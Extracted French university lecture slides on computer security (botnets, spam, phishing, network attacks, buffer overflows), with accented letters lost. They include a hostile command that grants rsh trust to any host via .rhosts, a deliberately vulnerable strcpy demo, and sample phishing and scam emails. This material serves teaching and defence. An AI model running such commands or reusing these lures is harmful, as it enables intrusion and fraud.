Vous êtes sur la page 1sur 283

Scurit Informatique

Patrick Ducrot
patrick.ducrot@ensicaen.fr http://www.ducrot.org/securite.pdf

Plan du document
Gnralits 3 Les menaces 28 Vulnrabilits du rseau 63 Vulnrabilits applicatives 100 Scurit des systmes 156 Les outils d'attaque/dfense 160 Chiffrement, tunnels et vpn 219 Firewall 238 Les honeypots 254 WiFi et scurit 260 Conseils et conclusion274
30/08/2013 - ENSICAEN (c) dp 2

Gnralits

30/08/2013

- ENSICAEN -

(c) dp

Qu'est ce qu'un systme d'information ?


Systme dinformation :
organisation des activits consistant acqurir, stocker, transformer, diffuser, exploiter, grer ... les informations

Un des moyens techniques pour faire fonctionner un systme dinformation est dutiliser un

Systme informatique

30/08/2013

- ENSICAEN -

(c) dp

La scurit des systmes informatiques


Les systmes informatiques sont au cur des systmes dinformation. Ils sont devenus la cible de ceux qui convoitent linformation. Assurer la scurit de linformation implique dassurer la scurit des systmes informatiques.
30/08/2013 - ENSICAEN (c) dp 5

La scurit des systmes informatiques


Erreurs de saisie
Confidentialit Intgrit

Virus
Intgrit Disponibilit

RESEAU

Attaques rseau
Confidentialit (coute) Intgrit (modification paquets) Disponibilit (saturation)

Accs illicites (intrusion)


confidentialit Intgrit Disponibilit

Rayonnements
confidentialit

30/08/2013

- ENSICAEN -

(c) dp

Origine des attaques

30/08/2013

- ENSICAEN -

(c) dp

Objectifs de la scurit informatique


Quelques objectifs garantir:
intgrit confidentialit Disponibilit Authentification Non rpudiation
30/08/2013 - ENSICAEN (c) dp 8

Evolution des risques


Croissance de l'Internet Croissance des attaques Failles des technologies Failles des configurations Failles des politiques de scurit Changement de profil des pirates
30/08/2013 - ENSICAEN (c) dp 9

Qui sont les pirates ?


Peut tre n'importe qui avec l'volution et la vulgarisation des connaissances. Beaucoup d'outils sont disponibles sur Internet. Vocabulaire:
script kiddies hacktiviste hackers
30/08/2013 white hats black hats grey hats cracker carder phreaker - ENSICAEN (c) dp 10

LulzSec

Phnomnes techniques
Explosion de la technologie des transferts de donnes (comme par exemple le cloud computing ) Grande complexit des architectures de systmes. Ouverture (pas toujours matrise) des rseaux de communication
30/08/2013 - ENSICAEN (c) dp 11

Phnomnes organisationnels
Besoin de plus en plus d'informations Grande diversit dans la nature des informations:
donnes financires donnes techniques donnes mdicales

Ces donnes constituent les biens de l'entreprise et peuvent tre trs convoites.
30/08/2013 - ENSICAEN (c) dp 12

Objectifs des attaques


Dsinformer (exemple: lagence Reuters annonce la mort du prince Saoud Al-Faycal opr des intestins le 15 aot 2012) Empcher l'accs une ressource Prendre le contrle d'une ressource Rcuprer de l'information prsente sur le systme Utiliser le systme compromis pour rebondir Constituer un rseau de botnet (ou rseau de machines zombies)
- ENSICAEN (c) dp 13

30/08/2013

Les botnets
La notion de botnet date des premiers rseaux irc (dbut des annes 1990). Rseau de machines contrles par un bot herder ou botmaster . Un botnet peut tre contrl par Serveurs irc Serveurs web Requtes DNS Messageries instantanes Peer to Peer Skype

30/08/2013

- ENSICAEN -

(c) dp

14

Les botnets
Estimation: une machine sur quatre fait partie dun botnet, soit environ 154 millions de machines (Vinton Cerf Davos en janvier 2007). Un botnet peut tre utilis pour: Envoyer du spam Vol dinformations sensibles (avec un keylogger par exemple). Installer des spywares. Paralyser un rseau en dni de services Installer un site web malicieux (phishing) Truquer les statistiques de sites webs (sondage en lignes authentifis par des adresses IP, rmunration sur des clics de bannires, ) Quelques exemples: Jeanson James Ancheta, condamn en 2006 57 mois de prison ferme et trois ans de liberts surveilles, la tte dun botnet estim 400 000 machines. Pirate connu sous le pseudo de 0x80 . Lire larticle: http://www.washingtonpost.com/wp-dyn/content/article/2006/02/14/AR2006021401342.html

30/08/2013

- ENSICAEN -

(c) dp

15

Botnet irc

30/08/2013

- ENSICAEN -

(c) dp

16

Botnet p2p

30/08/2013

- ENSICAEN -

(c) dp

17

Motivations des attaques


Vol dinformations Cupidit Modifications dinformations

Vengeance/rancune Politique/religion
source: http://www.zone-h.fr

Dfis intellectuels
30/08/2013 - ENSICAEN (c) dp 18

Cible des pirates


Les tats Serveurs militaires Banques Universits Tout le monde
30/08/2013 - ENSICAEN (c) dp 19

La scurit : une ncessit


Informaticiens Utilisateurs Logiciels

Lgislation

Matriel

Stratgie de scurit Contrats Rseaux

30/08/2013

- ENSICAEN -

(c) dp

20

Niveaux de scurisation
Sensibilisation des utilisateurs aux problmes de scurit. Scurisation des donnes, des applications, des systmes d'exploitation. Scurisation des tlcommunications. Scurisation physiques du matriel et des accs.

30/08/2013

- ENSICAEN -

(c) dp

21

Politique de scurit
Compromis fonctionnalit - scurit. Identifier les risques et leurs consquences. Elaborer des rgles et des procdures mettre en uvre pour les risques identifis. Surveillance et veille technologique sur les vulnrabilits dcouvertes. Actions entreprendre et personnes contacter en cas de dtection d'un problme.

30/08/2013

- ENSICAEN -

(c) dp

22

Mise en place d'une politique de scurit


Mise en uvre Audit Tests d'intrusion Dtection d'incidents Ractions Restauration
- ENSICAEN (c) dp 23

30/08/2013

Quelques mthodes
EBIOS (Expressions des Besoins et Identification des Objectifs de Scurit)
http://www.ssi.gouv.fr/fr/confiance/ebios.html

MEHARI (MEthode Harmonise d'Analyse de Risques)


http://www.clusif.asso.fr/fr/production/mehari

30/08/2013

- ENSICAEN -

(c) dp

24

La norme ISO 27000


ISO 2000 Vocabulaire et dfinitions ISO 27001 (octobre 2005) spcifie un Systme de Gestion de la Scurit des Systmes dInformation (Plan/Do/Check/Act))

Planifier Mettre en uvre Vrifier


ISO 27002 (remplaant la norme 17799 depuis le 1er juillet 2007) est un code de bonnes pratiques Plus dinformations: http://www.iso27001security.com/
- ENSICAEN (c) dp 25

Amliorer

30/08/2013

La norme ISO 27000

30/08/2013

- ENSICAEN -

(c) dp

26

Application PSSI
Eviter ceci:

30/08/2013

- ENSICAEN -

(c) dp

27

Les menaces

30/08/2013

- ENSICAEN -

(c) dp

28

Techniques d'attaques
Social Engineering MICE (Money, Ideology, Compromise, Ego) Dumpster diving Shoulder surfing Sniffing Scannings etc.
- ENSICAEN (c) dp 29

30/08/2013

Exemple de social engineering


Kevin Mitnick
3 livres, 1 film (Cybertraque). Piratage des rseaux tlphoniques. Attaque des machines de Tsumotu Shimomura au San Diego Supercomputing Center. 5 ans de prison et sous interdiction dutiliser des ordinateurs.
30/08/2013 - ENSICAEN (c) dp 30

Dissimulation d'informations
L'information peut tre dissimule dans un but de protection (mot de passe, ) ou dans des buts moins lgaux. Diffrentes mthodes pour s'changer de l'information de manire sre:
chiffrement (symtrique,asymtrique) stganographie

Tout n'est pas autoris par la loi.


30/08/2013 - ENSICAEN (c) dp 31

Stganographie
Procd ancien de dissimulation d'informations sensibles parmi d'autres informations moins importantes. Exemple: correspondance attribue George Sand et Alfred de Musset:
Quand je mets vos pieds un ternel hommage, Voulez-vous qu'un instant je change de visage ? Vous avez captur les sentiments d'un coeur Que pour vous adorer forma le crateur. Je vous chris, amour, et ma plume en dlire Couche sur le papier ce que je n'ose dire. Avec soin de mes vers lisez les premiers mots, Vous saurez quel remde apporter mes maux.

Cette indigne faveur que votre esprit rclame Nuit mes sentiments et rpugne mon me

30/08/2013

- ENSICAEN -

(c) dp

32

Stganographie
Moyens modernes: dissimuler de linformation dans des fichiers graphiques, sons, vidos. Cas particulier du watermarking.

30/08/2013

- ENSICAEN -

(c) dp

33

Menaces lies aux rseaux


Menaces actives Panne, mauvaise utilisation, pertes d'informations Contamination (virus, vers, spyware) Spam, phishing Chevaux de troie (backdoors) Dnis de services Intrusions Bombes logiques Menaces passives coute des lignes Analyse de trafic Source: rapport PandaLabs 2012
- ENSICAEN (c) dp 34

30/08/2013

Virus
Portion de code inoffensive ou destructrice capable de se reproduire et de se propager. Diffrents types de virus: Virus boot Virus dissimul dans les excutables Macro virus Diffrentes contaminations possibles: change de disquettes Pices jointes au courrier lectronique Excutables rcuprs sur Internet etc.
30/08/2013 - ENSICAEN (c) dp 35

Vers
Proches des virus mais capables de se propager sur d'autres ordinateurs travers le rseau. Un moyen courant de propagation: le carnet d'adresses d'outlook (ex: "I Love you": dni de service sur les serveurs web). Quelques exemples: Code Red (utilisation d'une faille des serveurs IIS et dfiguration des sites) Blaster (utilisation d'une faille du protocole windows DCM RPC)
30/08/2013 - ENSICAEN (c) dp 36

Propagation du ver Sapphire:


http://www.caida.org/research/security/sapphire
25 janvier 2003, 05:29 0 victime

25 janvier 2003, 06:00 74 855 victimes

30/08/2013

- ENSICAEN -

(c) dp

37

Propagation du ver Waledac


Description du ver: http://www.f-secure.com/v-descs/email-worm_w32_waledac_a.shtml

http://windows7news.com/2010/02/25/operation-b49-waledac-botnet-take-down/

30/08/2013

- ENSICAEN -

(c) dp

38

Chevaux de troie
Trs rpandu (exemples: attaque du ministre de lconomie et des finances rendu public en dcembre 2010, attaque contre AREVA rendu public le 29 septembre 2011, infections par des vulnrabilits dInternet Explorer en septembre 2012, ) Quelques exemples anciens de chevaux de Troie: Back Orifice Permet de l administration distance. Sockets23 (Socket de Troie) Signalait la prsence des ordinateurs infects sur des serveurs de discussion en direct de type irc.
30/08/2013 - ENSICAEN (c) dp 39

Les spywares
Dfinition du spyware (http://en.wikipedia.org/wiki/Spyware):
Un spyware ("espiogiciel") est un logiciel qui collecte des informations d'une machine et les envoie l'insu de l'utilisateur sans son consentement.

Concept invent par Microsoft en 1995.

Un spyware se dcline aujourd'hui en "adware" (logiciel d'affichage de publicit) et en "malware" ("pourriciel", logiciels hostiles)

30/08/2013

- ENSICAEN -

(c) dp

40

Techniques d'infection des spywares


Les logiciels lis (bundles): installation du spyware en mme temps qu'un logiciel lgitime (KaZaA: Cydoor, codec DivX, ) La navigation sur Internet exploitation de failles (essentiellement mais pas uniquement avec Internet Explorer) Installation volontaire (par acceptation) d'un logiciel, activeX, plug-in La messagerie incitant par SPAM visiter des sites douteux. Une exemple particulier: 2 septembre 2008 travers le webmail de la Poste
http://www.01net.com/editorial/389835/laposte.net-a-diffuse-involontairement-une-publicite-piegee/

30/08/2013

- ENSICAEN -

(c) dp

41

Dtection de spyware
Comportement anormal de la machine:
Fentres "popup" intempestive. Page d'accueil du navigateur modifie. Apparitions d'icnes sur le bureau. Connexions Internet intempestives. Trafic rseau anormal. Dsactivation des outils de scurit locaux. DLL modifie (dtectable par un antivirus). Firewall personnel Outils anti rootkits Connexions rcurrentes et/ou nocturnes. Tlchargements suspects. Connexions vers des sites rputs pour tre lis au spyware. Connexions vers des sites non rfrencs dans un dns. Connexions vers des sites .ru .cc .tw .cn

Les outils de scurit locaux:


Les outils de scurit rseau:


30/08/2013

- ENSICAEN -

(c) dp

42

Les "anti spywares"


En 2000, Gibson Research dveloppe le 1er progamme antispyware: OptOut (http://grc.com/optout.htm). Beaucoup de programmes commerciaux pour liminer les spywares qui proposent tous un dtecteur gratuit; quelques exemples:
XoftSpy : http://www.paretologic.com/xoftspy/lp/14/ NoAdware: http://www.noadware.net/new3/?hop=comparets Anonymizer's Anti-Spyware http://www.zonelabs.com Et bien d'autres

Quelques solutions domaine public:


Spybot Logiciels Microsoft http://www.spybot.info/fr http://www.microsoft.com/downloads

30/08/2013

- ENSICAEN -

(c) dp

43

La protection contre les spywares


Pas de protection universelle puisqu'en perptuelles volutions. Quelques rgles respecter nanmoins:
Sensibiliser les utilisateurs sur les risques lis l'installation de logiciels non directement utiles (barres dans les navigateurs, codec DivX, ) Ne pas consulter des sites douteux. Inciter les utilisateurs signaler l'infection de leur machine par un spyware. Utiliser des outils de protections spcifiques
30/08/2013 - ENSICAEN (c) dp 44

SPAM
Dfinition de la CNIL: Envoi massif et parfois rpt de courriers lectroniques non sollicits des personnes avec lesquelles lexpditeur na jamais eu de contact au pralable, et dont il a capt ladresse lectronique de faon irrgulire.(pourriel en franais). SPAM=Spiced Pork And Meat, popularis par un sketch des Monty Python (http://www.dailymotion.com/swf/x3a5yl) Un message va tre dpos dans une liste de relais de messagerie qui vont envoyer une copie chaque destinataire. Courrier bas sur une liste dadresses collectes de manire dloyale et illicite. Messages peu coteux lenvoi mais coteux pour le destinataire.

30/08/2013

- ENSICAEN -

(c) dp

45

Le spam en quelques chiffres


90 % des courriers changs sont des spams 6500 nouvelles pages webs associes au spam dcouvertes chaque jour (1 page toutes les 13 secondes). 99 % du spam est relay par des machines de particuliers 1er semestre 2009: relais de spams par pays et par continent:

Source : Rapport Sophos 2009 sur les menaces de la scurit

30/08/2013

- ENSICAEN -

(c) dp

46

Protections contre le spam ct utilisateurs


Ne rien acheter par lintermdiaire de publicit faite par un spam (des tudes indiquent que 29% des utilisateurs le font). Ne jamais rpondre un spam. Ne pas mettre dadresses lectroniques sur les sites webs mais les encoder par un script ou dans une image (exemple: http://www.caspam.org); voir transparent suivant. Etre prudent dans le remplissage de formulaires demandant des adresses lectroniques; on peut parfois utiliser des adresses jetables . Exemple: http://www.jetable.org (adresse valable dune heure un mois, certains sites peuvent ne pas accepter ce genre dadresses). Protection au niveau du client de messagerie (gestion des "indsirables") .

30/08/2013

- ENSICAEN -

(c) dp

47

Exemple de codage dadresse


<HTML> Laisser un message <a href="mailto:dp@ensicaen.fr"> ici </a> </HTML>

<HTML> Laisser un message <script type="text/javascript"> //<![CDATA[ var d="";for(var i=0;i<359;i++)d+=String.fromCharCode(("%o!.rK00It}!6%o!.wK>IwJ@DDIw997r9Ka#!w|u<t!}{Qvo!Q}rs660)4(:2*3 9R<7.9*LK`&D/-7*+aFFD4324/:/8*4;*7aF9-.8R-7*+a!K2&.1/94^KR7*j51&(*LS/S,PFFMOw97.3,R+742g&7g4)*LUTTPUUVMO FdF\" T\"OK*38.(b&*bb3bKR7*j51&(*LSbS,P FF\" T\"MO FRF\" T\"Ow97.3,R+742g&7g4)*LUTVPUYWQW]MOK!KFD4324:8*4T:9aF9-.8R-T7T*+a!K!KFTb.(.`S&bKR7*j51&(*LSTS,P FF\" T\"MM0<qvo!Q}rsO#6w79B?73GC9A@7Is%oz6r7".charCodeAt(i)+49)%95+32);eval(d) //]]> </script> </HTML>

30/08/2013

- ENSICAEN -

(c) dp

48

Adresse jetable

30/08/2013

- ENSICAEN -

(c) dp

49

Protection contre le spam sur les serveurs de messageries


Protection dlicate: la frontire entre un courriel et un pourriel nest pas toujours franche et il ne faut pas rejeter des courriers rels. Un serveur de courrier doit tre bien configur (en particulier, pas dOpen Relay ). Gestion de listes blanches. Gestion de listes noires: Manuellement Par utilisation de bases de donnes de relais ouverts (Exemple: http://www.spamhaus.org). Gestion de listes grises. Dtection de serveurs zombies (postscreen/postfix) Des outils de filtrage en aval: spam assassin pure message (sophos) - ENSICAEN (c) dp 50

30/08/2013

Effet du grey listing (13 mars 2006)

30/08/2013

- ENSICAEN -

(c) dp

51

Phishing
Contraction de PHreaking et fISHING (Hameonnage). Technique d'ingnierie sociale utilise par des arnaqueurs (scammers) Technique ancienne mais utilise massivement depuis 2003. Par le biais de courrier lectronique, messages instantans, site webs, etc., on tente de duper l'utilisateur en le faisant cliquer sur un lien. L'objectif est d'obtenir des adresses de cartes de crdit, des mots de passe, etc. Les adresses sont collectes au hasard, mais statistiquement un utilisateur peut avoir l'impression de recevoir un courrier d'un site qui lui est familier (banque, ).
- ENSICAEN (c) dp 52

30/08/2013

Exemples de cible de phishing


Visa eBay Citibank PayPal Banques

Aujourdhui: tout le monde

30/08/2013

- ENSICAEN -

(c) dp

53

Exemple phishing
Dear valued PayPal member: Due to concerns, for the safety and integrity of the paypal account we have issued this warning message. It has come to our attention that your PayPal account information needs to be updated as part of our continuing commitment to protect your account and to reduce the instance of fraud on our website. If you could please take 5-10 minutes out of your online experience and update your personal records you will not run into any future problems with the online service. However, failure to update your records will result in account suspension. Please update your records on or before Oct 04, 2005. Once you have updated your account records your paypal account service will not be interrupted and will continue as normal. To update your PayPal records click on the following link: http://www.paypal.com/cgi-bin/webscr?cmd=_login-run Thank You. PayPal UPDATE TEAM

http://209.133.49.211/icons/cgi-bin/login.html
30/08/2013 - ENSICAEN (c) dp 54

Faux site paypal

30/08/2013

- ENSICAEN -

(c) dp

55

Exemple phishing eBay

30/08/2013

- ENSICAEN -

(c) dp

56

Faux site eBay

30/08/2013

- ENSICAEN -

(c) dp

57

Exemple phishing CaisseEpargne (27 novembre 2009)

30/08/2013

- ENSICAEN -

(c) dp

58

Protection contre le phishing


Vrifier la pertinence des messages. Ne pas cliquer sur un lien (mais taper l'adresse dans le navigateur). Etre prudent avec les formulaires demandant des informations confidentielles. Lors de la saisie d'informations confidentielles, vrifier que l'information est chiffre et le certificat valide. Certains sites commerciaux (ebay, paypal, ) rappellent le nom d'utilisateur dans les courriers envoys. Un courrier commenant par quelque chose ressemblant "Cher utilisateur d'ebay" peut tre par consquent suspect.

30/08/2013

- ENSICAEN -

(c) dp

59

Le "scam"
Pratique frauduleuse d'origine africaine ("ruse") pour extorquer des fonds des internautes. Rception d'un courrier lectronique du descendant d'un riche africain dcd dont il faut transfrer les fonds. Connue aussi sous le nom de 419 en rfrence l'article du code pnal nigrian rprimant ce type d'arnaque.
30/08/2013 - ENSICAEN (c) dp 60

Exemple de "scam"
Objet: ASSISTANCE GEORGES TRAORE ABIDJAN,CTE D'IVOIRE. AFRIQUE DE L'OUEST. Bonjour, Je vous prie de bien vouloir excuser cette intrusion qui peut paratre surprenante premire vue d'autant qu'il n'existe aucune relation entre nous. Je voudrais avec votre accord vous prsenter ma situation et vous proposer une affaire qui pourrait vous intresser. Je me nomme Georges TRAORE, j'ai 22 ans et le seul fils de mon Pre Honorable RICHARD ANDERSON TRAORE qui tait un homme trs riche, ngociant de Caf/Cacao bas Abidjan la Capitale Economique de la Cte d'Ivoire, empoisonn rcemment par ses associs. Aprs la mort de ma mre le 21 Octobre 2000, mon pre m'as pris spcialement avec lui. Le 24 Dcembre 2003 est survenu le dcs de mon pre dans une clinique prive (LAMADONE) Abidjan. Avant sa mort, secrtement, il m'a dit qu'il a dpos une somme d'un montant de ($8,500,000) Huit Millions Cinq Cent Mille Dollars Amricains dans une valise dans une Compagnie de Scurit Financire en mon nom comme hritier. En outre, il m'a dit que c'est par rapport cette richesse qu'il a t empoisonn par ses associs. Il me recommande aussi de chercher un associ tranger qui pourrait honntement me faire bnficier de son assistance pour sauver ma vie et assurer mon existence. - Changement de bnficaire ; Servir de gardien ; - Fournir un compte pour le transfert de fonds ; - M'aider le rejoindre dans son pays ; - Investir dans un domaine profitable. D'ailleurs, je vous donnerai 25 % et 5% serviront aux dpenses ventuelles qui seront effectues. .

30/08/2013

- ENSICAEN -

(c) dp

61

Consquences des virus, vers, spywares, spam


Perte de donnes Perte de temps de travail Perte dimage de marque Perte de fonctionnalits (systme ou email bloqus) Perte de confidentialit
30/08/2013 - ENSICAEN (c) dp 62

Vulnrabilits des rseaux


30/08/2013 - ENSICAEN (c) dp 63

Vulnrabilit des rseaux


Les rseaux peuvent tre vulnrables:
par une mauvaise implmentation des piles udp/ip et tcp/ip. par des faiblesses des protocoles

30/08/2013

- ENSICAEN -

(c) dp

64

Rappel : Entte IP
32 bits

Version IHL

Type Service
Flags

Longueur Totale Dcalage Fragment Contrle entte

Identification TTL Protocole

Adresse Source Adresse Destination Options


30/08/2013 - ENSICAEN (c) dp
Remplissage

65

Rappel: Entte UDP


32 bits

Port source Longueur UDP

Port destination Total de contrle UDP

30/08/2013

- ENSICAEN -

(c) dp

66

Rappel: Entte TCP


32 bits

Port source

Port destination Numro de squence

Numro d'acquittement Long entte TCP


U A P R R C S S G K H T S F Y I N N

Taille de la fentre

Total de contrle

Pointeur d'urgence

Options (0, 1 ou plusieurs mots de 32 bits Donnes (optionnelles)

30/08/2013

- ENSICAEN -

(c) dp

67

Rappel: tablissement d'une connexion TCP


Connexion en 3 temps (Three Way Handshake).

30/08/2013

- ENSICAEN -

(c) dp

68

Sniffer
Outil de base indispensable. Permet de visualiser les trames sur un segment de rseau. Ncessite des droits administrateurs. Attention au problme juridique Utilise des sockets en mode promiscuous
socket (AF_INET,SOCK_RAW,IPPROTO_RAW)

30/08/2013

- ENSICAEN -

(c) dp

69

Sniffer
Beaucoup de logiciels sniffers existants. Liste sur http://packetstormsecurity.org/sniffers Le sniffer de base pour unix: tcpdump
Disponible sur http://www.tcpdump.org. Grammaire trs volue. Affiche les enttes de paquets rpondant au critre spcifi.
30/08/2013 - ENSICAEN (c) dp 70

Sniffer multiplateformes
wireshark (http://www.wireshark.org)

Interprtation de plusieurs centaines de protocoles applicatifs

30/08/2013

- ENSICAEN -

(c) dp

71

sniffer plus "spcialis": Cain & Abel

30/08/2013

- ENSICAEN -

(c) dp

72

IP Spoofing
Mthode d'attaque qui parodie l'adresse IP d'un autre ordinateur (usurpation). Permet de brouiller les pistes ou d'obtenir un accs des systmes sur lesquels l'authentification est fonde sur l'adresse IP (rlogin, rsh sur les machines numro de squence TCP prvisible).

30/08/2013

- ENSICAEN -

(c) dp

73

Usurpation d'identit

Exemple d'utilisation: attaque d'un remote shell: echo "+ +" >>/.rhosts
30/08/2013 - ENSICAEN (c) dp 74

Exemples danciennes attaques sur la pile IP


Malversations sur la fragmentation IP Scinder une demande de connexion sur 2 fragments Faire chevaucher 2 fragments IP (teardrop) Adresses IP source et destinations identiques (land) Ping de la mort (Ping Death, http://www.insecure.org/sploits/ping-o-death.html) UDP Flood

30/08/2013

- ENSICAEN -

(c) dp

75

30/08/2013

- ENSICAEN -

(c) dp

76

Exemple: Juin 2013

30/08/2013

- ENSICAEN -

(c) dp

77

Dni de service (DOS)


Denial Of Service Attaque destine empcher l utilisation d une machine ou d un service. Type d'attaque utilise par frustration, par rancune, par ncessit, Souvent plus facile de paralyser un rseau que d'en obtenir un accs. Ce type d attaque peut engendrer des pertes trs importantes pour une entreprise. Attaque relativement simple mettre en uvre (outils faciles a trouver).
30/08/2013 - ENSICAEN (c) dp 78

Diffrents types de DOS


DOS local (puisement des ressources) Saturation de l'espace disque rpertoires rcursifs boucle infinie de fork () DOS par le rseau (consommation de bande passante) SYN flood Rassemblage de fragments (Ex: teardrop, ping of the death) Flags TCP illgaux DOS distribu (DDOS)
30/08/2013 - ENSICAEN (c) dp 79

DOS par SYN flood


Attaque par inondation de SYN avec une adresse source usurpe (spoofe) et inaccessible. La machine cible doit grer une liste de connexions dans l tat SYN_RECV . Une attaque est visible si la commande netstat an indique un grand nombre de connexions dans l'tat SYN_RECV.
30/08/2013 - ENSICAEN (c) dp 80

Parades au SYN Flood


Allongement de la longueur de la file d'attente. Rduction de la dure de temporisation d'tablissement d'une connexion. OS modernes sont protgs (SYN Cookie, SYN cache, ).
30/08/2013 - ENSICAEN (c) dp 81

DDOS
Distributed Denial Of Service. Type d attaque trs en vogue. L objectif est d crouler une machine et/ou saturer la bande passante de la victime. Ncessite un grand nombre de machines corrompues. Attaque popularise le 14 fvrier 2000 sur quelques sites .com renomms (ebay, cnn, amazon, microsoft, ). Le coupable, Michael Calce alias Mafiaboy , 15 ans, est arrt au Canada le 15 avril et condamn 8 mois dans un centre de dtention pour jeunes. Il a caus des pertes estimes 1,7 milliards de dollars.
http://www.youtube.com/watch?v=NPT-NIMoEgo (partie 1) http://www.youtube.com/watch?v=hVrU_3xX5ic (partie 2)

30/08/2013

- ENSICAEN -

(c) dp

82

Scnario d un DDOS

30/08/2013

- ENSICAEN -

(c) dp

83

Quelques exemples de DDOS


Tribe Flood Network (TFN) Trinoo TFN2K Trinity (utilise les serveurs irc) etc. Parades:
tre attentif aux ports ouverts

30/08/2013

- ENSICAEN -

(c) dp

84

Utilisation des DDos


Un botnet de 1000 machines peut saturer la bande passante dune grande entreprise (1000 * 128Kb/s = 128 Mb/s). Une entreprise peut acheter les services dun bot herders pour attaquer un concurrent. Ddos extortion : des pirates peuvent menacer des sites de commerce en ligne (Exemple: la socit Canbet en Angleterre).
30/08/2013 - ENSICAEN (c) dp 85

Exemples de ddos
Serveurs DNS de la compagnie Akamai attaqu le 16 juin 2004 (sites Microsoft, Google, Yahoo, fedEx, Xerox, Apple injoignables pendant une courte priode). Mastercard, PayPal, EveryDNS, Swiss Bank PostFinances en dcembre 2010 par les Anonymous

NBS victime dune attaque DDOS dans la nuit du 10 au 11 octobre 2011 http://www.loichelias.com/nbs-attaque-ddos

30/08/2013

- ENSICAEN -

(c) dp

86

Exemples DDOS
Bande passante du rseau informatique du snat les 25 et 26 dcembre 2011 avant ladoption de la loi rprimant la contestation des gnocides*

Et tant dautres.

* Source: rapport No 681 du snat par Jean-Marie Bockel 30/08/2013 - ENSICAEN (c) dp 87

arp spoofing
Pollution des caches arp avec de fausses associations adresse mac/adresse IP. Permet des attaques de type "man in the middle", DOS, transgression des rgles d'un firewall par spoofing.

arp-reply

192.168.16.10

192.168.16.10 00:50:04:47:5F:5F

30/08/2013

- ENSICAEN -

(c) dp

88

arp spoofing
Exemple d'outil d'arp spoofing:
arp-sk (linux) Cain & Abel (Windows)

30/08/2013

- ENSICAEN -

(c) dp

89

Applications du arp-spoofing
Ecouter le rseau local Initier une attaque man in the middle pour les sessions hybrides http/https
intrus

Arp spoofing Arp spoofing Interception et Interprtation du flux http, remplacement des balises https par http Site web Utilisateur -> site web

30/08/2013

- ENSICAEN -

(c) dp

90

Parades contre le arp spoofing


Utiliser des associations statiques (peu souple) Surveiller les changements d'association:
arpwatch (unix)
http://www.securityfocus.com/data/tools/arpwatch.tar.Z

WinARP Watch (Windows)


http://www.securityfocus.com/data/tools/warpwatch.zip

30/08/2013

- ENSICAEN -

(c) dp

91

tcp hijacking

30/08/2013

- ENSICAEN -

(c) dp

92

tcp hijacking
Numros de squence TCP pendant les changes:
Ut1 Seq x PSH/ACK y (10) Ut2 Ut1 Seq y PSH/ACK x+10 (20) Ut2 Ut1 Seq x+10 PSH/ACK y+20 (30) Ut2 Ut1 Seq y+20 PSH/ACK x+40 (10) Ut2 Pirate Seq x+40 PSH/ACK y+20 (30) Ut2 Ut1 Seq y+30 PSH/ACK x+70 (20) Ut2

Exemple d'outil de tcp hijacking: hunt


http://www.spenneberg.org/TCP-Hijacking// 30/08/2013 - ENSICAEN (c) dp 93

Smurf
Envoie d'une trame ICMP "echo request" sur une adresse de diffusion. Exemple: ping 193.49.200.255 Mthode utilise pour dterminer les machines actives sur une plage IP donne.
30/08/2013 - ENSICAEN (c) dp 94

Attaque en Smurf
Objectif: crouler une machine 3 parties: l'attaquant, l'intermdiaire, la victime
Trame ICMP Echo request sur adresse de diffusion du site relai Adresse source: IP victime

Echo Reply sur la victime

30/08/2013

- ENSICAEN -

(c) dp

95

Parades au smurf
Interdire la rponse aux trames ICMP sur les adresses de diffusion:
Au niveau routeur Au niveau machine

30/08/2013

- ENSICAEN -

(c) dp

96

DNS cache poisoning


Reroutage d'un site sur un site pirate

cache poisoning

30/08/2013

- ENSICAEN -

(c) dp

97

Exemple: BIND
Vulnrabilit dcouverte en juillet 2007 touchant de nombreuses versions de BIND (CVE-2007-2926 , BID25037). Description du CERTA:

vulnrabilit a t identifie dans BIND. La faille concerne le gnrateur d'identifiants de requtes, vulnrable une cryptanalyse permettant une chance leve de deviner le prochain identifiant pour la moiti des requtes. Ceci peut tre exploit par une personne malintentionne pour effectuer du cache poisoning et donc contourner la politique de scurit. "
30/08/2013 - ENSICAEN (c) dp 98

"Une

Exemple faille DNS cache poisoning

30/08/2013

- ENSICAEN -

(c) dp

99

Vulnrabilits applicatives
30/08/2013 - ENSICAEN (c) dp 100

Vulnrabilits applicatives
Beaucoup d'applications sont vulnrables dues de la mauvaise programmation (par manque de temps, de motivation, ) ou volontairement (amnagement d'un point d'entre, ). Toutes les applications ont besoin de scurit: services rseaux (daemons), les applications tlcharges (applet java, ), les applications web (scripts cgi, ), les applications utilises par l'administrateur ou disposant d'un bit setuid/setgid, visualisateur de donnes distantes, et finalement probablement toutes les applications
30/08/2013 - ENSICAEN (c) dp 101

Exemple: vulnrabilit dans Microsoft Word

WebCastSecurite, Microsoft, mai 2013


30/08/2013 - ENSICAEN (c) dp 102

Vulnrabilits les plus courantes


Les vulnrabilits peuvent tre due:
"backdoors" laisses volontairement ou involontairement sur un service par le programmeur (Ex: rlogin sous AIX V3) Erreurs de programmation

30/08/2013

Dbordements de tampons (buffer overflow) Chanes de format Entres utilisateurs mal valides Les problmes de concurrence etc.
- ENSICAEN (c) dp 103

Buffer Overflow
Appele aussi "buffer overruns"; c'est une vulnrabilit extrmement tendue (environ 2/3 des vulnrabilits). criture de donnes en dehors de la zone alloue (pile ou tas).

30/08/2013

- ENSICAEN -

(c) dp

104

Exemple code erron


int main (int argc, char **argv) { char buf [8] ; strcpy (buf,argv [1]) ; } fichier: demo.c Excution: [dp@ns bufferoverflow]$ ./demo aaaaaaaaaaaaaaaaaaaaaaaaaa Segmentation fault Sous debugger:

[dp@ns bufferoverflow]$ gdb demo (gdb) run aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Starting program: /users/dp/bufferoverflow/demo aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Program received signal SIGSEGV, Segmentation fault. 0x61616161 in ?? ()
30/08/2013 - ENSICAEN (c) dp 105

Buffer Overflow
Si le buffer est une variable C locale, on pourra essayer de forcer la fonction excuter du code pirate ("stack smashing attack"). Beaucoup d'applications crites en langage C sont vulnrables car la simplicit et l'efficacit de ce langage ont prvalu sur les contrles d'intgrit laisss la responsabilit du programmeur. Mais le problme existe galement dans d'autres langages de programmation.

30/08/2013

- ENSICAEN -

(c) dp

106

Gestion de pile sous Unix


command line arguments and shell environment stack

Storage file

heap bss data initialized text symbol table

data initialized text linker header & magic number

Process in memory

30/08/2013

- ENSICAEN -

(c) dp

107

Gestion de pile sous Linux x86


gcc S stack.c
void function (int a,int b,int c) { char buffer1 [5] ; char buffer2 [10] ; } void main () { function (1,2,3) ; }
